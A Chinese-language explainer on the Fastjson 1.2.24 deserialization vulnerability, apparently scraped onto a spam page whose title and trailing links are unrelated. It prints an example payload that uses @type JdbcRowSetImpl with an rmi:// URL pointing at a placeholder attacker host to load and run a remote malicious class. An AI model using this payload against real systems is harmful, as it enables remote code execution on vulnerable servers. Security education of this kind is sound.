当前位置: 首页 > news >正文

本溪市网站建设网站开发工作描述

本溪市网站建设,网站开发工作描述,lumen wordpress 下载,wordpress国主题公园fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用type标记字符的原始类型&#x…

fastjson漏洞

  • fastjson工作原理
  • 攻击原理
    • 补充
  • 例子

fastjson工作原理

fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用==@type==标记字符的原始类型,在反序列话时会读取@type以此把内容反序列化到对象,在上述过程中会调用到库中的setter和getter方法

攻击原理

攻击者传入一个恶意构造的json内容,程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数,进而促使恶意代码执行
合理构造一个JSON使用@type指定一个想要攻击的类库就可以实现攻击

补充

仅影响Fastjson1.2.24及之前版本

例子


{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "rmi://攻击者的IP地址/恶意类","autoCommit": true}
  • JSON 数据包:这里展示的 JSON 数据包包含一个名为 b 的对象,其中有一个 @type 字段,指定了这个对象的类型为
    com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。
  • 恶意数据:在 dataSourceName 字段中,提供了一个远程方法调用 (RMI) 的 URL,指向攻击者的 IP
    地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。
  • 自动提交:autoCommit 字段被设置为 true,表明在反序列化后自动执行某些操作。
http://www.yayakq.cn/news/468376/

相关文章:

  • 怎么用ppt做网站设计网站设计论文选题
  • 咸宁公司网站建设专门做恐怖片的网站
  • 外贸网站建设szjijie搜索引擎关键词竞价排名
  • 鞍山企业网站建设网页升级紧急通知91
  • 建设网站的价格表wordpress腾讯云插件
  • 某企业电子商务网站建设北京设计公司官网
  • 广州旅游团购网站建设杭州做代发的网站有哪些
  • 网站基本参数设置模块erp系统登录入口
  • 网站查询ip解析怎样制作一个app软件
  • 哈尔滨网站备案手续费湛江seo代理商
  • vps搭建网站是什么意思养老做增减的网站
  • 给微商做网站国外优秀论文网站
  • wap手机网站制作_x wordpress
  • 如何自己弄网站涨口碑说做的网站
  • 长春 网站 设计各大网络平台的推广内容和方法
  • 浙江省城乡和建设厅网站首页担保公司网站模板
  • 无锡网站策划公司百度seo公司哪家强一点
  • APP网站怎么做个人建设视频网站制作
  • 铜陵电子商务网站建设小说网站开发多少钱
  • 电影网站如何做不侵权网站建设公司创业计划书
  • 和15岁女儿做很舒服网站企业网站的设计怎么做
  • 网站备案接口最简单的手机网站制作
  • 做的好看的网站合肥平台网站建设
  • 如何优化网站加载速度视频网站怎么建设
  • 网站新闻对百度优化有用吗排名优化方案
  • 烟台市做网站网站建设培训厦门
  • 厦门网站建设制作工具项目策划书模板
  • 长宁网站建设优化seo专业的培训行业网站开发
  • 外贸网站哪个比较好微信公众平台注册公众号
  • 那些钓鱼网站是怎么做的米拓网站建设-app定制开发